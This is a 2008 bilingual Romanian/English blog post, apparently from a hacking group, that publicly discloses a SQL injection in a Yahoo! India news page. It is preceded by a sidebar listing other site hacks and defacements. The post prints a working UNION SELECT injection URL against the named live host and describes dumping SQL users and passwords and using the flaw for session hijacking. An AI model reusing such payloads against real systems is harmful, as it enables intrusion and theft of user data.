- Hacker Uses XSS and Google Street View Data to Determine Physical Location
- CAnCAn te iubim, CA CA tine nu gasim. Superfete.cancan.ro e de rahat
- Deface (?!?) pe Cotidianul.ro
- Virusi in clipuri video [how to]
- Cyber-Bullying – palma parinteasca a noului mileniu
- Christopher “moot” Poole: The case for anonymity online
- Wtf Avira?
- Some old story about tagged.com
- Pwning cam girls for fun
- Tabloshit
- Yahoo! again - XSS in Uncategorized (357 Visits)
- Yahoo! again - bad settings? in Uncategorized (252 Visits)
- Fanii nostri in Uncategorized (183 Visits)
- Frustrant in Uncategorized (146 Visits)
- La multi ani România, la multi ani românilor in Uncategorized (137 Visits)
- Weblog.ro - Shell via Local File Inclusion in Uncategorized (119 Visits)
- Yahoo! epic fail - permanent xss unleashed in Uncategorized (50 Visits)
- ... in Uncategorized (38 Visits)
- XSS Ownage - hi5 vs. Yahoo! + video in Uncategorized (2 Visits)
- Ce nu se invata la scoala - Tipuri si tehnici spam/Hi5 (4) in Uncategorized (2 Visits)
- Hackersblog.org is now blog.rstcenter.com in (1781 Visits)
- O mica dar importanta precizare in (1389 Visits)
- Twitter in (821 Visits)
- This is the end in (803 Visits)
- Ce servicii de mail folositi? in (791 Visits)
- Un nou membru in (747 Visits)
- La multi ani România, la multi ani românilor in (737 Visits)
- Inca o pierdere de timp in (690 Visits)
- De reţinut in (648 Visits)
- Azi este ziua userilor hackersblog.org in (625 Visits)
- SMS scam (1) in (583 Visits)
- Hi5.com coders read this in (581 Visits)
- Dezinformare sau proasta informare? in (577 Visits)
- Phishing Raiffeisen cu atasament html in (534 Visits)
- Phishing Bancpost in (502 Visits)
- Si tentativele de phishing pot fi amuzante in (435 Visits)
- Ce nu se invata la scoala - Tipuri si tehnici spam/mail (2) in (2789 Visits)
- Ce nu se invata la scoala - Tipuri si tehnici spam/Hi5 (4) in (2706 Visits)
- Despre CSRF, hi5.com, cum sa trisezi la concursuri s.a.m.d. in (1171 Visits)
- [Utilitare] Suna gratis de pe internet sau de pe iPhone in (1146 Visits)
- Ce nu se invata la scoala - (D)DOS (5) in (974 Visits)
- Virusi in clipuri video [how to] in (893 Visits)
- Ce nu se invata la scoala - Tipuri si tehnici spam (1) in (742 Visits)
- Yahoo! redirects - a big issue (with video) in (583 Visits)
- Internet vs. privacy (1) in (485 Visits)
- Ca musca in... in (447 Visits)
- RedTube.com ... The Free Sex Video Community in (13215 Visits)
- usa.kaspersky.com hacked ... full database acces , sql injection in (5197 Visits)
- libertatea.ro vulnerabil la (blind) sql injection in (3008 Visits)
- Pwning cam girls for fun in (2649 Visits)
- Telegraph.co.uk hacked, sql injection in (2628 Visits)
- Facebook hacked - sql injection in (2511 Visits)
- Simpatie.ro, matrimoniale3x.ro, apetisant.ro, deliciu.ro , etc Sql injection in (2484 Visits)
- F-Secure.com - SQL Injection + Cross Site Scripting in (1815 Visits)
- [Hacked]Bitdefender (Portugal) exposes sensitive customer data in (1802 Visits)
- Wtf Avira? in (1763 Visits)
- Christopher "moot" Poole: The case for anonymity online in (1535 Visits)
- Digital Photocopiers Loaded With Secrets in (1475 Visits)
- Hacker Uses XSS and Google Street View Data to Determine Physical Location in (703 Visits)
- Wannabe Hackers [1] - Cum sa hack-uiesti RapidShare-ul in (620 Visits)
- Wannabe Hackers [2] - cum sa faci un virus by sppy_hacker in (611 Visits)
- Hope 2603 – Kevin Mitnick - Life a Computer Hacker – Revealed in (476 Visits)
- PRIVACY IS DEAD - GET OVER IT, Pt 01-34 (Recommended by Hackersblog ) in (410 Visits)
- Oldies but goodies - Freedom Downtime - The Story of Kevin Mitnick in (394 Visits)
- [Video] The History Of Hacking in (382 Visits)
- Email Security - Why You Should Encrypt Your Email - Part One in (377 Visits)
- Deface - tuttoaffari.lastampa.it si citymusiclab.city.corriere.it in (3516 Visits)
- RNS vs. RAI - citizenreport.rai.it hacked. in (3326 Visits)
- Hi5 email finder si sfarsitul a tot ceea ce inseamna privacy in social networking in (3150 Visits)
- Se poate sparge parola de Yahoo? in (2655 Visits)
- Planete-plus-intelligente.lemonde.fr defaced by R.N.S. in (2519 Visits)
- Free SMS time, TrimiteSMS.ro in (2512 Visits)
- Gmail uber hacking in (2368 Visits)
- Cancan.ro spart pentru a doua oara intr-o zi in (2302 Visits)
- Camera de supraveghere a universitatii Alexandru Ioan Cuza din Iasi in (2289 Visits)
- Stiri cu antena3 in (2228 Visits)
Posted on December 8th, 2008
O companie care valoreaza miliarde de dolari si care se presupune ca ar trebui sa aibe doar programatori “buni”, programatori care nu lasa in urma lor gauri de securitate prin site-ul Yahoo!.
De XSS-uri se stie deja ca au fost destul de multe prin *.yahoo.com si totodata ca mai sunt si altele inca. Insa cand vine vorba de SQL Injection in yahoo.com, de privacy-ul promis de Yahoo! care pare sa se clatine, de posibilitatea de a avea acces la informatii private ale milioanelor de useri ai site-ului yahoo.com, gluma se ingroasa.
Sa continuam cu prezentarea vulnerabilitatii (gasita de Kenpachi si kw[3]rln @ hackersblog.org & rstcenter.com).
Una din paginile vulnerabile la SQL Injection: http://in.jagran.yahoo.com/article/index.php?choice=homepage_getnews&state=1&city=87%20union%20all%20select%201,concat_ws(0x203a20,version(),user()),3,4,
5,6,7,8,9,10,11,12,13,14,15,16,17,18
Ce se vede aici? Informatii despre versiunea serverului SQL si userul curent de pe care se executa query-urile:
Listarea userelor SQL si parolele acestora:
Si, evident, multe altele.
Totodata, acest SQL Injection se poate folosi si pe post de XSS, folosit in special pentru furtul de sesiuni
Partea proasta e ca inca nu au adoptat o politica de recunoastere a bugurilor/vulnerabilitatilor din site-urile lor si a celor care le gasesc. Sa renunte la orgoliu si vor avea doar de castigat, majoritatea persoanelor care gasesc buguri in site-ul yahoo nu le mai dezvaluie tocmai din cauza asta. Totodata asta ar duce si la mai putine situatii neplacute gen conturi sparte / furate
===========================================================
English version:
A company worth billions of dollars which is supposed to have the best programmers, the kind of company that won’t leave any security wholes in the system. Yahoo! system that is!
XSS bugs are already yesterday’s news when we talk about Yahoo! They are all over the place on the *.yahoo.com subdomains.
But we are not talking here about minor XSS bugs. We mean serious business. We are talking about the kind of security which exposes the privacy of millions of users of the “trustable” Yahoo! services.
We are talking about SQL Injection. One of the worst kinds of security breach.
We will present here the vulnerability found by Kenpachi and kw[3]rln @ hackersblog.org & rstcenter.com .
Here you have one of the pages vulnerable to SQL Injection: http://in.jagran.yahoo.com/article/index.php?choice=homepage_getnews&state=1&city=87%20union%20all%20select%201,concat_ws(0x203a20,version(),user()),3,4,
5,6,7,8,9,10,11,12,13,14,15,16,17,18
What do we find here? Information about the SQL server, its version and the current user SQL user:
A list with SQL users and passwords:
And of course, much more information available at the hand of an attacker.
Moreover, this SQL Injection can be used as an XSS, especially for session hijacking:
The sad part is that Yahoo! didn’t adopt any policy whatsoever regarding this kind of problems. They dont admit they have a problem, nor do they give any credits to those who find them.
Following in the footsteps of other sites, Yahoo! could learn to gain from this. Vast majority of those who find bugs don’t disclose them anymore precisely for the fact that Yahoo! is in total denial. By coming out clean, Yahoo! would also reduce the amount of hacked/stolen accounts and other shameful security breaches like the one we present here.
December 8th, 2008 at 1:32 am
Si cand ma gandesc ca astora le dau cate 19$/an, ma ia groaza…:)
December 8th, 2008 at 3:50 am
Erau romani aia ce l-au hackerit ?
December 8th, 2008 at 11:51 am
@Aiurea
Da. Cei doi fac parte din echipa de editori ai blogului si sunt admini pe rstcenter.com.
December 8th, 2008 at 9:18 pm
Mdea, ratati. Ce sa zic ii mananca orgoliul. Mai bine ar admite si ar repara, pentru siguranta utilizatorilor. Felicitari Kenpachi si kw3rln inca o data.
December 9th, 2008 at 5:14 pm
fixed fara mersi fara futute’n cur. mai punem si altele nu e problema.
December 10th, 2008 at 1:39 am
ba esti prost? :O
).. ai idee cat valoreaza aia? ia du-te la gugle sau la microsoft si spune-le sa-ti faca o oferta 
)
December 20th, 2008 at 1:24 pm
hehe tocmai ce am gasit si eu una pe alt site de yahoo
January 21st, 2009 at 11:18 pm
[...] dat, unele baze de date vor fi compromise. Pentru că, să fim serioși, nu contează cât de mare ești (da, mi-e lene să caut și alte surse), întotdeauna se vor găsi găuri în sistemul tău [...]
February 28th, 2009 at 2:29 am
[...] (2 Visits)Ce nu se invata la scoala – Tipuri si tehnici spam/Hi5 (4) in Uncategorized (2 Visits)yahoo.com SQL Injection, XSS [se intampla si la case mari] in XSS (220 Visits)Emiii, Florineee – xss in eok.ro (IAR) in XSS (173 Visits)Mailuri periculoase [...]